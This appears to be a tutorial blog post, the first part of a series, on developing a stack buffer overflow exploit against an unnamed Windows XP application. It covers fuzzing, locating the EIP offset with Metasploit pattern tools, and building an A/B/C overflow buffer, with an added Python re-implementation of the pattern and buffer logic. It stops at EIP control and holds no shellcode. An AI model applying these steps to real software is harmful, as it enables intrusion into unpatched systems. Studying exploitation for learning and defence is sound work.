Exploit work on my victim, PART 1

Why I test this: because it does not work on my victim.

OS:

-----------------

BackTrack 5 R2

Windows XP (Chinese)

-----------------

First, I will write a Perl script to check whether the vulnerable app crashes.

This way, I set junk=10000, as follows:

[screenshot 2]

[screenshot 1]

When I set junk=20000, the app still does not crash, as shown in Immunity Debugger:

[screenshot 3]

Now I set junk=30000:

[screenshot 4]

[screenshot 5]

[screenshot 6]

I can see “EIP 41414141”, and the app crashes and disappears.

Now I know that the EIP overwrite lies between 20000 and 30000, so I narrow the range further with a binary search: 25000 A's + 5000 B's, as follows:

EIP 41414141 (AAAA) ------------- between 20000 and 25000
EIP 42424242 (BBBB) ------------- between 25000 and 30000

This is the Perl script, as follows:

[screenshot 7]

I run it under Immunity Debugger, as follows:

[screenshot 8]

I can see “EIP 42424242”, so it means:
EIP 42424242 (BBBB) ------------- between 25000 and 30000
Given that EIP was overwritten before the end of the 30000-character buffer,

I have overwritten EIP with BBBB, and I can also see my buffer in ESP.

Now I will find the exact location in my buffer that overwrites EIP; Metasploit is my best choice.

This tool helps me calculate the offset, as follows:

[screenshot 9]

Copy the data into the Perl script:

[screenshot 10]

Run the app in Immunity Debugger, as follows:

[screenshot 11]

[screenshot 12]

I can see “EIP 6A42346A”.

Now I need the Metasploit tool to calculate the exact length of the buffer before the write into EIP, as follows:

[screenshot 13]

OK, 1063: this is the buffer length needed to overwrite EIP.

So I create a file with 25000+1063 A's (26063), then add 4 B's.

I also add some C's after the EIP overwrite.

Here is the Perl:

[screenshot 15]

Run it in Immunity Debugger, as follows:

[screenshot 14]

I can see that ESP is full of CCCC.
EIP contains BBBB, which is exactly what we wanted, so now we control EIP. On top of that, ESP points to our buffer (C's).
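To show where the 1063 above comes from, here is an added Python re-implementation of the Metasploit pattern_create / pattern_offset logic and of the final A/B/C buffer layout (my code, not the post's Perl scripts and not Metasploit itself). It assumes the pattern was placed after the 25000 A's and was 5000 bytes long, which is what the 25000/30000 bisection step implies.

```python
import string

# Layout used on this page: 25000 A's first, then the Metasploit pattern.
# The pattern length (5000) is an assumption taken from the 25000/30000 bisection step.
PREFIX_LEN = 25000
PATTERN_LEN = 5000


def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0 Aa1 ... Aa9 Ab0 ... Az9 Ba0 ... Zz9, repeating.
    One full cycle is 26*26*10*3 = 20280 bytes; past that, offsets are no longer unique."""
    cycle = "".join(u + l + d
                    for u in string.ascii_uppercase
                    for l in string.ascii_lowercase
                    for d in string.digits)
    return (cycle * (length // len(cycle) + 1))[:length]


def pattern_offset(eip_hex, length=PATTERN_LEN):
    """Map the EIP value shown by the debugger (e.g. '6A42346A') back to the four
    pattern bytes that landed in it. x86 is little-endian, so the register value is
    the memory bytes in reverse order: 6A 42 34 6A -> 'jB4j' -> 'j4Bj'.
    Returns -1 when EIP holds something other than a pattern slice (for instance
    '41414141', meaning the A prefix reached EIP and the pattern never did)."""
    try:
        needle = bytes.fromhex(eip_hex)[::-1].decode("ascii")
    except ValueError:  # not hex, or bytes outside the printable pattern alphabet
        return -1
    return pattern_create(length).find(needle)


def build_buffer(offset, prefix_len=PREFIX_LEN, tail_len=500):
    """The page's final layout: A's up to the EIP slot, 4 B's in the slot, C's after it."""
    return b"A" * (prefix_len + offset) + b"B" * 4 + b"C" * tail_len


def eip_slot(buf, prefix_len, offset):
    """The four bytes of buf that land in EIP, for checking the layout before running it."""
    return buf[prefix_len + offset:prefix_len + offset + 4]


if __name__ == "__main__":
    off = pattern_offset("6A42346A")
    print("offset into pattern:", off)                                # 1063, as on the page
    print("A's before EIP:", PREFIX_LEN + off)                        # 26063
    print("EIP slot:", eip_slot(build_buffer(off), PREFIX_LEN, off))  # b'BBBB'
```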
